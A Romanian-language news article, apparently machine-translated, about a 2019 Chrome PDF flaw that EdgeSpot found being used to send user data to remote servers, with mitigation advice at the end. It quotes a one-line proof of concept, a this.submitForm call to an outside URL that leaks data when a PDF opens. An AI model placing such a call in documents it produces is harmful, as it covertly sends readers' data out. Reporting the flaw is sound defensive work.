Exploitarea serviciului de detectare EdgeSpot a descoperit o vulnerabilitate Chrome intr-o zi zero care exploateaza documentele PDF. Vulnerabilitatea permite atacatorilor să recolteze date sensibile folosind documente PDF dăunătoare deschise în Chrome.

Imediat ce victima deschide fișierele PDF respective în Google Chrome, un program rău intenționat începe să funcționeze în fundal colectând datele utilizatorului.

Datele sunt apoi transmise către serverul de la distanță care este controlat de hackeri. S-ar putea să vă întrebați ce date sunt aspirate de atacatori, acestea vizează următoarele date pe computer:

• adresa IP
• Calea completă a fișierului PDF din sistem
• Versiuni pentru sistem de operare și Chrome

Feriți-vă de fișierele PDF conduse de malware

Ați putea fi surprins să știți că nu se întâmplă nimic atunci când Adobe Reader este utilizat pentru deschiderea fișierelor PDF. În plus, solicitările HTTP POST sunt utilizate pentru a transfera date către serverele de la distanță fără nicio intervenție a utilizatorului.

Experții au observat că unul dintre cele două domenii readnotifycom sau burpcollaboratornet primea datele.

Vă puteți imagina intensitatea atacului, luând în considerare faptul că majoritatea software-ului antivirus nu este capabil să detecteze probele detectate de EdgeSpot.

Experții dezvăluie că atacatorii folosesc API-ul Javascript PDF „this.submitForm ()” pentru a colecta informațiile sensibile ale utilizatorilor.

Am testat-o ​​cu un PoC minim, un apel simplu la API cum ar fi „this.submitForm („ http://google.com/test ”)” va face ca Google Chrome să trimită datele personale pe google.com.

Experții au aflat de fapt că acest bug Chrome era exploatat de două seturi distincte de fișiere PDF rău intenționate. Ambele au fost circulate în octombrie 2017 și, respectiv, în septembrie 2018.

În mod special, datele colectate pot fi folosite de atacatori pentru a regla atacurile în viitor. Rapoartele sugerează că primul lot de fișiere a fost compilat folosind serviciul de urmărire PDF al ReadNotify.

Utilizatorii pot utiliza serviciul pentru a urmări vizualizările utilizatorilor. EdgeSpot nu a distribuit niciun detaliu cu privire la natura celui de-al doilea set de fișiere PDF.

Cum să rămâi protejat

Serviciul de detectare a exploatării EdgeSpot a dorit să avertizeze utilizatorii Chrome utilizatori despre riscurile potențiale, deoarece nu este de așteptat ca patch-ul să fie lansat în viitorul apropiat.

EdgeSpot a raportat lui Google despre vulnerabilitate anul trecut, iar compania a promis să lanseze un plasture la sfârșitul lunii aprilie. H

dator, puteți lua în considerare utilizarea unei soluții temporare la problemă prin vizualizarea locală a documentelor PDF primite utilizând o aplicație alternativă pentru cititor PDF.

În mod alternativ, puteți de asemenea să deschideți documentele PDF în Chrome prin deconectarea sistemelor dvs. de la Internet. Între timp, puteți aștepta actualizarea Chrome 74 care este de așteptat să fie lansată pe 23 aprilie.